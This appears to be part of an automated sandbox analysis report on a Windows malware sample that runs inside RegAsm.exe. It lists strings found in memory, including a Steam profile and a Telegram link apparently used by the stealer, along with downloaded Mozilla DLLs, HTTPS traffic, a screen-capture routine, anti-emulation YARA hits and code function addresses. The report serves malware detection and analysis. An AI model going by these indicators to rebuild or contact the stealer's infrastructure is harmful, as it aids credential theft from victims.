                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
                      Source: 76561199681720597[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=SPpMitTYp6ku&l=en
                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                      Source: RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                      Source: RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
                      Source: RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000FF2000.00000004.00000020.00020000.00000000.sdmp, GHCGDA.2.drString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000FF2000.00000004.00000020.00020000.00000000.sdmp, GHCGDA.2.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                      Source: EBAFBG.2.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: EBAFBG.2.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: EBAFBG.2.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drString found in binary or memory: https://help.steampowered.com/en/
                      Source: GHCGDA.2.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
                      Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: https://mozilla.org0/
                      Source: 76561199681720597[1].htm.2.drString found in binary or memory: https://steamcommunity.com/
                      Source: RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drString found in binary or memory: https://steamcommunity.com/discussions/
                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                      Source: 76561199681720597[1].htm.2.drString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199681720597
                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drString found in binary or memory: https://steamcommunity.com/market/
                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drString found in binary or memory: https://steamcommunity.com/my/wishlist/
                      Source: file.exe, 00000000.00000002.1610588292.0000000000705000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, RegAsm.exe, 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2171023727.0000000000F50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199681720597
                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drString found in binary or memory: https://steamcommunity.com/profiles/76561199681720597/badges
                      Source: RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drString found in binary or memory: https://steamcommunity.com/profiles/76561199681720597/inventory/
                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000F50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199681720597GL
                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000F50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199681720597eL
                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drString found in binary or memory: https://steamcommunity.com/workshop/
                      Source: 76561199681720597[1].htm.2.drString found in binary or memory: https://store.steampowered.com/
                      Source: 76561199681720597[1].htm.2.drString found in binary or memory: https://store.steampowered.com/about/
                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drString found in binary or memory: https://store.steampowered.com/explore/
                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drString found in binary or memory: https://store.steampowered.com/legal/
                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drString found in binary or memory: https://store.steampowered.com/mobile
                      Source: RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drString found in binary or memory: https://store.steampowered.com/news/
                      Source: RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drString found in binary or memory: https://store.steampowered.com/points/shop/
                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                      Source: RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drString found in binary or memory: https://store.steampowered.com/stats/
                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drString found in binary or memory: https://store.steampowered.com/steam_refunds/
                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                      Source: AEHIEC.2.drString found in binary or memory: https://support.mozilla.org
                      Source: AEHIEC.2.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                      Source: AEHIEC.2.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
                      Source: RegAsm.exe, 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                      Source: RegAsm.exe, 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ost.exe
                      Source: file.exe, 00000000.00000002.1610588292.0000000000705000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, RegAsm.exe, 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://t.me/talmatin
                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000FF2000.00000004.00000020.00020000.00000000.sdmp, GHCGDA.2.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
                      Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: https://www.digicert.com/CPS0
                      Source: EBAFBG.2.drString found in binary or memory: https://www.ecosia.org/newtab/
                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000FF2000.00000004.00000020.00020000.00000000.sdmp, GHCGDA.2.drString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
                      Source: EBAFBG.2.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                      Source: AEHIEC.2.drString found in binary or memory: https://www.mozilla.org
                      Source: RegAsm.exe, 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
                      Source: AEHIEC.2.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                      Source: RegAsm.exe, 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/ost.exe
                      Source: RegAsm.exe, 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                      Source: RegAsm.exe, 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/WHpWtlueYcBpS.exe
                      Source: AEHIEC.2.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                      Source: RegAsm.exe, 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/v4.0.30319
                      Source: RegAsm.exe, 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                      Source: AEHIEC.2.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                      Source: RegAsm.exe, 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/vchost.exe
                      Source: AEHIEC.2.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                      Source: RegAsm.exe, 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                      Source: RegAsm.exe, 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/chost.exe
                      Source: AEHIEC.2.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                      Source: RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%2
                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                      Source: unknownHTTPS traffic detected: 23.195.238.96:443 -> 192.168.2.4:49730 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 65.109.242.112:443 -> 192.168.2.4:49731 version: TLS 1.2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004112E3 _EH_prolog,memset,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GlobalFix,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,2_2_004112E3

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                      Source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                      Source: 0.2.file.exe.630000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                      Source: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CA262C0 PR_dtoa,PR_GetCurrentThread,strlen,NtFlushVirtualMemory,PR_GetCurrentThread,memcpy,memcpy,2_2_6CA262C0
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006B017F0_2_006B017F
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006941FB0_2_006941FB
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006CC2C10_2_006CC2C1
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006983D00_2_006983D0
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006B05BD0_2_006B05BD
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006D477F0_2_006D477F
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006DC82F0_2_006DC82F
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006B0AE60_2_006B0AE6
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00680D280_2_00680D28
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0065CF150_2_0065CF15
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0065CF150_2_0065CF15
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00694F900_2_00694F90
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006B10220_2_006B1022
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0065CF150_2_0065CF15
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006ADF2A0_2_006ADF2A
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006AE3440_2_006AE344
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006EE4000_2_006EE400
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0067A4080_2_0067A408
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0067A4080_2_0067A408
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006AE7700_2_006AE770
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006AEB8A0_2_006AEB8A
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006AEFFB0_2_006AEFFB
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006AF47F0_2_006AF47F
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006CB6F90_2_006CB6F9
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006978200_2_00697820
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006AF8F00_2_006AF8F0
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006BB8A50_2_006BB8A5
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006BB8A50_2_006BB8A5
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006AFD2E0_2_006AFD2E
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00697E900_2_00697E90
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041C1DA2_2_0041C1DA
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041E2F02_2_0041E2F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041BC892_2_0041BC89
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041CE072_2_0041CE07
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C89ECC02_2_6C89ECC0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C8FECD02_2_6C8FECD0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C966C002_2_6C966C00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C97AC302_2_6C97AC30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C8AAC602_2_6C8AAC60
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C936D902_2_6C936D90
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C8A4DB02_2_6C8A4DB0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CA2CDC02_2_6CA2CDC0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CA28D202_2_6CA28D20
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C9CAD502_2_6C9CAD50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C96ED702_2_6C96ED70
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C926E902_2_6C926E90
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C8AAEC02_2_6C8AAEC0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C940EC02_2_6C940EC0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C980E202_2_6C980E20
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C93EE702_2_6C93EE70
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C9E8FB02_2_6C9E8FB0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C8AEFB02_2_6C8AEFB0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C97EFF02_2_6C97EFF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C8A0FE02_2_6C8A0FE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C8A6F102_2_6C8A6F10
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C9E0F202_2_6C9E0F20
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C90EF402_2_6C90EF40
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C962F702_2_6C962F70
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C98C8C02_2_6C98C8C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C9A68E02_2_6C9A68E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C8F08202_2_6C8F0820
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C92A8202_2_6C92A820
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C9748402_2_6C974840
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C9609B02_2_6C9609B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C9309A02_2_6C9309A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C95A9A02_2_6C95A9A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C9BC9E02_2_6C9BC9E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C8D49F02_2_6C8D49F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C8F69002_2_6C8F6900
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C8D89602_2_6C8D8960
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C91EA802_2_6C91EA80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C94EA002_2_6C94EA00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C958A302_2_6C958A30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C91CA702_2_6C91CA70
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C8A8BAC2_2_6C8A8BAC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C940BA02_2_6C940BA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C98EBD02_2_6C98EBD0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C9A6BE02_2_6C9A6BE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C9CA4802_2_6C9CA480
